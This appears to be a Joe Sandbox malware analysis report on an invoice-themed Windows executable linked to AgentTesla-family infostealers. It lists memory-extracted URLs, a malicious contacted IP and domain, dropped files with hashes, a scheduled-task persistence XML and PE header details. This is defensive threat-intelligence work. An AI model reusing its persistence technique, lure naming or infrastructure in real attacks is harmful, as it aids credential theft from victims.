                          http://www.tiro.comINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersINVOICE_NO._29998172.exe, 00000000.00000003.366549798.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.365774175.0000000005DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.goodfont.co.krINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comINVOICE_NO._29998172.exe, 00000000.00000003.363538297.0000000005DCC000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364528393.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364115711.0000000005DCB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comjINVOICE_NO._29998172.exe, 00000000.00000003.363657222.0000000005DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comionaINVOICE_NO._29998172.exe, 00000000.00000003.386928424.0000000005DC0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.carterandcone.comlINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sajatypeworks.comINVOICE_NO._29998172.exe, 00000000.00000003.360854011.0000000005DDB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.360864782.0000000005DDB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.360830990.0000000005DDB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlNINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/cTheINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmINVOICE_NO._29998172.exe, 00000000.00000003.367109894.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cnINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.363028287.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/DPleaseINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers8INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.carterandcone.comitkINVOICE_NO._29998172.exe, 00000000.00000003.363520351.0000000005DF4000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.363556816.0000000005DF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.agfamonotype.5INVOICE_NO._29998172.exe, 00000000.00000003.364564498.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364485994.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364509296.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364376733.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.364528393.0000000005DCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.fonts.comINVOICE_NO._29998172.exe, 00000000.00000002.398030415.0000000001607000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deDPleaseINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers:INVOICE_NO._29998172.exe, 00000000.00000003.365753646.0000000005DD6000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.365728088.0000000005DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.zhongyicts.com.cnINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlCINVOICE_NO._29998172.exe, 00000000.00000003.365970540.0000000005DCC000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.366153312.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.366056911.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.365997383.0000000005DCC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameINVOICE_NO._29998172.exe, 00000000.00000002.398102973.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, txQleCu.exe, 00000005.00000002.437574152.0000000003341000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.comttcoINVOICE_NO._29998172.exe, 00000000.00000003.386928424.0000000005DC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.sakkal.comINVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cn/t-FINVOICE_NO._29998172.exe, 00000000.00000003.363243179.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.363307593.0000000005DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          5.100.152.24
                                          		gimpex-imerys.comUnited Kingdom
                                          		394695PUBLIC-DOMAIN-REGISTRYUStrue

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:37.1.0 Beryl
                                          Analysis ID:876157
                                          Start date and time:2023-05-26 11:29:02 +02:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 21s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:15
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample file name:INVOICE_NO._29998172.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@15/9@4/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 37
                                          • Number of non-executed functions: 5
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          11:30:02API Interceptor11x Sleep call for process: INVOICE_NO._29998172.exe modified
                                          11:30:08Task SchedulerRun new task: txQleCu path: C:\Users\user\AppData\Roaming\txQleCu.exe
                                          11:30:08API Interceptor26x Sleep call for process: powershell.exe modified
                                          11:30:21API Interceptor9x Sleep call for process: txQleCu.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          5.100.152.24NQAD_617375995793_01062020.vbsGet hashmaliciousUnknownBrowse
                                          • sangeetsarees.com/cgi-sys/suspendedpage.cgi

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          PUBLIC-DOMAIN-REGISTRYUS9CNELGT7BK7qyUE.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                          • 208.91.199.224
                                          INVOICE_NO._29998172.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                          • 5.100.152.24
                                          anticipado_de_la_factura_060296.exeGet hashmaliciousAgentTeslaBrowse
                                          • 199.79.62.115
                                          bank_copy.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.91.199.89
                                          PO-STS5492.exeGet hashmaliciousAgentTesla, NSISDropperBrowse
                                          • 208.91.198.143
                                          Q-44315.exeGet hashmaliciousAgentTeslaBrowse
                                          • 111.118.212.38
                                          https://jetsetsecretsmusic.com/pnn4gGet hashmaliciousPhisherBrowse
                                          • 45.113.122.245
                                          SOLICITUD_DE_COTIZACI#U00d3N.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.91.199.224
                                          SecuriteInfo.com.Variant.Fragtor.194921.4682.25666.exeGet hashmaliciousFabookie, Nymaim, PrivateLoader, RedLine, SmokeLoaderBrowse
                                          • 103.53.42.238
                                          https://myalumni.mcgill.ca/redirect.aspx?linkID=805890&sendId=208699&eid=228301&gid=2&tokenUrl=//Cherokeebrick.siddiquelawassociates.com?e=bWFyc2hhLnJvd2xhbmRAY2hlcm9rZWVicmljay5jb20=Get hashmaliciousHTMLPhisherBrowse
                                          • 111.118.215.174
                                          TT_Remittance_copy.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 208.91.199.224
                                          SHIPPING_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                          • 103.21.58.122
                                          Setup.exeGet hashmaliciousFabookie, Nymaim, PrivateLoader, RedLine, SmokeLoaderBrowse
                                          • 103.53.42.238
                                          Install.exeGet hashmaliciousFabookie, Nymaim, PrivateLoader, RedLine, SmokeLoaderBrowse
                                          • 103.53.42.238
                                          Install.exeGet hashmaliciousFabookie, Nymaim, PrivateLoader, RedLine, SmokeLoaderBrowse
                                          • 103.53.42.238
                                          swift_copy.exeGet hashmaliciousAgentTeslaBrowse
                                          • 5.100.152.24
                                          oZIDuC0SMY.exeGet hashmaliciousFabookie, Nymaim, PrivateLoader, RedLineBrowse
                                          • 103.53.42.238
                                          purchase_order.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                          • 216.10.249.166
                                          PAYMENT_SLIP.exeGet hashmaliciousAgentTeslaBrowse
                                          • 103.21.58.122
                                          PAYMENT_SLIP.exeGet hashmaliciousAgentTeslaBrowse
                                          • 103.21.58.122

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INVOICE_NO._29998172.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:modified
                                          Size (bytes):1302
                                          Entropy (8bit):5.3499841584777394
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84bE4Ks:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                          MD5:4664C2114894A4BFC1E657FC08C72FF4
                                          SHA1:95A1E14E2AD65BCA561261DA3899074BF5276AED
                                          SHA-256:6E36229D13672B4304C696812B365F2E5657875DD0E11F13AE010566CC87607A
                                          SHA-512:4E7862716D5C0BC2174E819BAB329A2974FE83A36D5417EE732AB2F3D77D95620B3D462A1C9608F5FE90A48030140DE53DB642F8C370CD8E191BDBE83C638CA1
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\txQleCu.exe.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\txQleCu.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.355304211458859
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):21900
                                          Entropy (8bit):5.599272798882325
                                          Encrypted:false
                                          SSDEEP:384:bYtCR60w4KuihiQ/+sMSBx2jNiiJ9gVSIo3rV1Vm0W1AVrdtss82TA+iuYb:bCJhf/9M4gJSVc73JDob
                                          MD5:90A9DBBCB9C023C3FA5339081410DA65
                                          SHA1:3F0378DB93E07D23F2DD26CF154B7324CD46FEEE
                                          SHA-256:16CFF2718CA61BCF64DDD24185C5319B3D51A16F49CC16B97B804F5464FDDAE6
                                          SHA-512:8C836B4D06A483954CF7FA40766F306D08A04038FE19FB74787C58C9918FAA3FAB77A054206BD428693B4D9C8E15A07C8E9A4AB9F1F1396D41CE488567662472
                                          Malicious:false
                                          Preview:@...e...............................+.n..............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_it5td5e2.jr0.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:U:U
                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                          Malicious:false
                                          Preview:1

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q2kzcy2e.mex.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:U:U
                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                          Malicious:false
                                          Preview:1

                                          C:\Users\user\AppData\Local\Temp\tmp3339.tmp

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\txQleCu.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1594
                                          Entropy (8bit):5.144574656694575
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtsxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTsv
                                          MD5:9C4FDC87E1E537ABEADB6168F6B1F2B9
                                          SHA1:65A8A9475A9986C191C059140DCB0BE3D191D23C
                                          SHA-256:DF3C80F0AB594B87A5C2A0825DA9910683EEE59042553A2B38EEFCF497D66EC6
                                          SHA-512:507DBB6A5D5696DDE792D88C5D4DB92C1E921385DC3DE882D5C5A77ACEF438654D19E8BDBD4A17A8580578487BBCF7D941E9736EB4E31E1DF8626553B16E89A4
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                          C:\Users\user\AppData\Local\Temp\tmpEB82.tmp

                                          Download File
                                          Process:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1594
                                          Entropy (8bit):5.144574656694575
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtsxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTsv
                                          MD5:9C4FDC87E1E537ABEADB6168F6B1F2B9
                                          SHA1:65A8A9475A9986C191C059140DCB0BE3D191D23C
                                          SHA-256:DF3C80F0AB594B87A5C2A0825DA9910683EEE59042553A2B38EEFCF497D66EC6
                                          SHA-512:507DBB6A5D5696DDE792D88C5D4DB92C1E921385DC3DE882D5C5A77ACEF438654D19E8BDBD4A17A8580578487BBCF7D941E9736EB4E31E1DF8626553B16E89A4
                                          Malicious:true
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                          C:\Users\user\AppData\Roaming\txQleCu.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):694272
                                          Entropy (8bit):7.757320557135654
                                          Encrypted:false
                                          SSDEEP:12288:4l7z5GoJiGaq5auWZwv3R9uHmVcHRazfsiL7P6g2isejTsuf:a5GoR5aihwHmVcxCj7P6jiH3T
                                          MD5:024997939B7CE9B28382176C0A70CEC8
                                          SHA1:48EF66CBADFFF627B81794AAAB7DB1A6413CB43B
                                          SHA-256:13E98DCBF169F54503A15D9415B086222AE48F2E872C69C9417E56D29F610B85
                                          SHA-512:E8740F7F6943E5B42248F657CFFA7874856549FD44BCB5C0D41FB955FEF8101F057DD410D8078A163F4B4BEAA0648531C048C4F5474A00DB8FA923B5D1F672EC
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 25%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pd..............0..r...$........... ........@.. ....................................@.................................l...O.......4 ..........................t{..T............................................ ............... ..H............text....p... ...r.................. ..`.rsrc...4 ......."...t..............@..@.reloc..............................@..B........................H........K...3......".......p.............................................(....*.0..-.......~....- r...p.....(....o....s...........~....*.~....*.......*.0..........(....rE..p~....o......t....*.0..j........(.....(......+H.{....o..........%.~1....o.....o.....%.~1....o.....o....o*....o....&..X..~/....i2...}....*...0..........s.....s......{....o......{....o....(........+e..{....o......o....o.....o....o....o....(....o......{....o......o....o.....o....o....t....o.......X....~/....i

                                          C:\Users\user\AppData\Roaming\txQleCu.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.757320557135654
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:INVOICE_NO._29998172.exe
                                          File size:694272
                                          MD5:024997939b7ce9b28382176c0a70cec8
                                          SHA1:48ef66cbadfff627b81794aaab7db1a6413cb43b
                                          SHA256:13e98dcbf169f54503a15d9415b086222ae48f2e872c69c9417e56d29f610b85
                                          SHA512:e8740f7f6943e5b42248f657cffa7874856549fd44bcb5c0d41fb955fef8101f057dd410d8078a163f4b4beaa0648531c048c4f5474a00db8fa923b5d1f672ec
                                          SSDEEP:12288:4l7z5GoJiGaq5auWZwv3R9uHmVcHRazfsiL7P6g2isejTsuf:a5GoR5aihwHmVcxCj7P6jiH3T
                                          TLSH:6CE423D432399817F8B7BBB112112E700BA53E957428EBDA9DC6239F16D3F42920770B
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pd..............0..r...$........... ........@.. ....................................@................................

                                          File Icon

                                          Icon Hash:f3c6f37969f3c632

                                          Static PE Info

                                          General

                                          Entrypoint:0x4a90be
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
